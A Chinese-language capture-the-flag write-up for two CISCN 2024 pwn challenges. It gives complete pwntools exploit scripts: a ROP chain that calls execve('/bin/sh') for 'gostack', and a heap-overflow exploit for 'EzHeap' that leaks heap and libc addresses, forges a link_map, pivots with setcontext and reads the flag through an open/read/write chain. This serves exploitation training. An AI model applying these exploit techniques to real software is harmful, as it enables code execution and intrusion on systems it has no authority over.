ciscn_pwn

第一天_gostack

64位的静态编译题

很明显的syscall和很多可以利用的gadget

利用syscall向bss段写入 bin/sh，再syscall执行execve(‘bin/sh’,0,0),拿到flag

from pwn import*
from LibcSearcher import *
p=remote("8.147.134.47",16589)
#p=process("./gostack")
elf=ELF('./gostack')
context.log_level="debug"
# Gadgets and syscall addresses
syscall_address = 0x404043
rax_ret_address = 0x40f984
rdi_6_ret_address = 0x4a18a5
rsi_ret_address = 0x42138a
rdx_ret_address = 0x4944ec

# Create the payload
payload = b'a' * 0x100
payload += p64(elf.bss()) + p64(0x10) + p64(0) * 0x18
payload += p64(rdi_6_ret_address) + p64(0) * 6
payload += p64(rsi_ret_address) + p64(elf.bss() + 0x200)
payload += p64(rdx_ret_address) + p64(0x100)
payload += p64(rax_ret_address) + p64(0)
payload += p64(syscall_address)
payload += p64(rdi_6_ret_address) + p64(elf.bss() + 0x200) + p64(0) * 5
payload += p64(rdi_6_ret_address) + p64(elf.bss() + 0x200) + p64(0) * 5
payload += p64(rdi_6_ret_address) + p64(elf.bss() + 0x200) + p64(0) * 5
payload += p64(rsi_ret_address) + p64(0)
payload += p64(rdx_ret_address) + p64(0)
payload += p64(rax_ret_address) + p64(0x3b)
payload += p64(syscall_address)

# Send the payload
p.sendlineafter('message :\n', payload)
input()
p.sendline('/bin/sh\x00')
p.interactive()

EzHeap

edit函数存在堆溢出

开启了沙箱保护,这是一道堆的orw。

泄露出堆的基地址

add_chunk(0x28)
add_chunk(0x28)

# Edit and leak heap address
edit_chunk(0, 0x50, b'a' * 0x50)
show_chunk(0)
io.recvuntil(b'a' * 0x50)
gdb.attach(io)
pause()
heap_leak = u64(io.recvuntil(b'Welcome to CISCN 2024!', drop=True).ljust(8, b'\x00'))
heap_base = heap_leak << 12

将free_hook改成setcontext,通过setcontext控制rsp进而orw,构造rop最后获得flag

from pwn import *

elf = ELF("./EzHeap")
context.log_level = 'debug'
context.arch = 'amd64'
io=process('EzHeap')
#io = remote('8.147.129.121', 26987)

def add_chunk(size, content=b''):
    io.sendlineafter("choice >> ", '1')
    io.sendlineafter("size:", str(int(size)))
    io.sendafter("content:", content)

def delete_chunk(index):
    io.sendlineafter("choice >> ", '2')
    io.sendlineafter("idx:", str(index))

def edit_chunk(index, size, content):
    io.sendlineafter("choice >> ", '3')
    io.sendlineafter("idx:", str(index))
    io.sendlineafter("size:", str(size))
    io.sendafter("content:", content)

def show_chunk(index):
    io.sendlineafter("choice >> ", '4')
    io.sendlineafter("idx:", str(index))

def exit_program():
    io.sendlineafter("choice >> ", '5')

# Add initial chunks
add_chunk(0x28)
add_chunk(0x28)

# Edit and leak heap address
edit_chunk(0, 0x50, b'a' * 0x50)
show_chunk(0)
io.recvuntil(b'a' * 0x50)
gdb.attach(io)
pause()
heap_leak = u64(io.recvuntil(b'Welcome to CISCN 2024!', drop=True).ljust(8, b'\x00'))
heap_base = heap_leak << 12

# Edit chunk to set up fake chunk
edit_chunk(0, 0x50, b'\x00' * 0x28 + p64(0x21) + b'\x00' * 0x18 + p64(0xd1))

# Leak libc address
edit_chunk(1, 0x30, b'a' * 0x30)
show_chunk(1)
io.recvuntil(b'a' * 0x30)
libc_leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = libc_leak - 0x21ace0

# Edit chunk to consolidate chunks
edit_chunk(1, 0x30, b'\x00' * 0x28 + p64(0xf1))

# Set up libc addresses
setcontext_address = libc_base + 0x539e0 + 61
read_address = libc_base + 0x1147d0
write_address = libc_base + 0x114870
rtld_global_address = libc_base + 0x285040
rtld_3_address = libc_base + 0x2865a0

pop_rdi = libc_base + 0x2a3e5
pop_rsi = libc_base + 0xe7d0d
pop_rdx = libc_base + 0x11f2e7  # r12
ret = libc_base + 0x1193c1
pop_rax = libc_base + 0x45eb0
syscall = libc_base + 0x91316
target_address = ((heap_base + 0x1e30) >> 12) ^ rtld_global_address

# Add chunks to manipulate heap
add_chunk(0x78)  # Chunk 2
add_chunk(0x78)  # Chunk 3
add_chunk(0x78)  # Chunk 4
add_chunk(0x78)  # Chunk 5
edit_chunk(5, 0x100, b'a' * 0x78 + p64(0x21) + p64(target_address))
add_chunk(0x18)  # Chunk 6
add_chunk(0x18)  # Chunk 7
add_chunk(0x18)  # Chunk 8
add_chunk(0x18)  # Chunk 9
add_chunk(0x18, p64(heap_base + 0x300) + p64(5) + p64(rtld_3_address))

heap_leak_adjusted = heap_base - 0x650
l_next_address = libc_base + 0x286890

# Create link map
link_map = p64(0)
link_map += p64(l_next_address)
link_map += p64(0)
link_map += p64(heap_leak_adjusted + 0x940)
link_map += p64(0) * 28
link_map += p64(heap_leak_adjusted + 0xa50)
link_map += p64(heap_leak_adjusted + 0xa70)
link_map += p64(heap_leak_adjusted + 0xa60)
link_map += p64(0x10)
link_map += p64(setcontext_address)
link_map += p64(ret)
link_map += p64(0) * 13
link_map += p64(heap_leak_adjusted + 0x200)
link_map += b'./flag'.ljust(8, b'\x00')
link_map += p64(0)
link_map += p64(0x100)
link_map += p64(0) * 2
link_map += p64(heap_leak_adjusted + 0xc60)
link_map += p64(ret)
link_map += p64(0) * 38
link_map += p64(0x800000000)

# Create ROP chain
rop_chain = p64(ret) * 0x1
rop_chain += p64(pop_rdi) + p64(heap_leak_adjusted + 0xaf0)
rop_chain += p64(pop_rax) + p64(2)
rop_chain += p64(pop_rsi) + p64(0)
rop_chain += p64(syscall)

rop_chain += p64(pop_rdi) + p64(3)
rop_chain += p64(pop_rsi) + p64(heap_leak_adjusted + 0x800)
rop_chain += p64(pop_rdx) + p64(0x50) + p64(0)
rop_chain += p64(read_address)
rop_chain += p64(pop_rdi) + p64(1)
rop_chain += p64(pop_rsi) + p64(heap_leak_adjusted + 0x800)
rop_chain += p64(pop_rdx) + p64(0x50) + p64(0)
rop_chain += p64(write_address)

# Edit chunk with link map and ROP chain
edit_chunk(0, 0x400, link_map + rop_chain)

# Exit and trigger the payload
exit_program()

io.interactive()